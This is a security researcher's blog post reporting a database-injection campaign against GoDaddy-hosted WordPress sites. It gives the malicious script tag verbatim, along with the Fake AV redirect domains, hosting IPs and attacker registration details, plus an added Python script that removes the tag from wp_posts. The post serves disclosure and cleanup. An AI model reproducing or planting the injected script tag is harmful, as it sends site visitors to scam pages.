Attacks against GoDaddy – acrossuniverseitbenet + Hilary Kneber + HardSoft

For the last few days we’ve been tracking another large-scale attack against GoDaddy shared-hosted sites. GoDaddy has been a target for a while, with mass infections happening often.

This time, the attackers changed tactics: instead of infecting the PHP files, they injected malicious code into the database. On infected WordPress sites, they added the following JavaScript to every post (in the wp_posts table):

<script src= "http://acrossuniverseitbenet.com/js.php?kk=10"></script>

As you can imagine, this JavaScript redirects the user to the infamous “Fake AV” pages:

www3.smartsuite-4u.in
www3.top-scan-foru.in
www4.first-internetmaster.net
www4.smartinternet-foryou.net
www4.seeeresafe.in
www4.seefredsafe.in
www3.save-internet-foru.com

All of them are hosted at 65.23.153.126 and 91.193.194.64. If you are a hosting provider, please make sure to block those IP addresses and domains (none of them are currently blacklisted).

As for who is behind this attack, it seems to be the same group as in the previous attacks. They’ve changed their name to Hilary Buff instead of Hilary Kneber.

Registrant Contact:
HardSoft, inc
Hilary Buff admin@acrossuniverseitbenet.com
56764545 fax: 56764545
29/2 Sun street. Montey 29
London NY 45453
gb

If your site is currently infected, you have to remove these malicious entries from every post (just log in to wp-admin to do so).
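For sites with too many posts to edit by hand, the same cleanup can be scripted. The following is an added example, not code from the original post: it reports and strips script tags pointing at the host named above from wp_posts.post_content, leaving other scripts alone. It assumes an in-memory SQLite table as a stand-in for the WordPress MySQL database, and the function names are hypothetical.

```python
import re
import sqlite3
from urllib.parse import urlparse

# Host taken from the injected tag shown in the post.
BAD_HOSTS = {"acrossuniverseitbenet.com"}
# An empty external <script src=...></script> element, quoted with ' or ".
SCRIPT_RE = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*["']\s*([^"'>\s]+)[^>]*>\s*</script\s*>""",
    re.IGNORECASE,
)

def is_injected(src):
    """True when the script URL's hostname is on the blocklist."""
    return (urlparse(src).hostname or "").lower() in BAD_HOSTS

def strip_injected(content):
    """Return (cleaned_content, removed_srcs); other scripts are untouched."""
    removed = []
    def repl(m):
        if is_injected(m.group(1)):
            removed.append(m.group(1))
            return ""
        return m.group(0)
    return SCRIPT_RE.sub(repl, content), removed

def clean_posts(conn, dry_run=True):
    """Report {post ID: [srcs]}; rewrite the affected rows unless dry_run."""
    report = {}
    for post_id, content in conn.execute("SELECT ID, post_content FROM wp_posts").fetchall():
        cleaned, removed = strip_injected(content or "")
        if removed:
            report[post_id] = removed
            if not dry_run:
                conn.execute("UPDATE wp_posts SET post_content = ? WHERE ID = ?", (cleaned, post_id))
    if not dry_run:
        conn.commit()
    return report

def demo_db():
    """Constructed sample data: SQLite stand-in for the WordPress database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_content TEXT)")
    bad = '<script src= "http://acrossuniverseitbenet.com/js.php?kk=10"></script>'
    conn.executemany("INSERT INTO wp_posts VALUES (?, ?)", [
        (1, "<p>Hello world</p>" + bad),
        (2, '<p>Clean</p><script src="https://example.org/app.js"></script>'),
        (3, bad + "<p>Another post</p>" + bad),
    ])
    return conn
```

Run it with dry_run=True first and review the report, and take a database backup before letting it rewrite rows.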


If you need help doing so, please contact us at support@sucuri.net or visit our site Sucuri Security. We can get you cleaned up pretty quickly.

About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.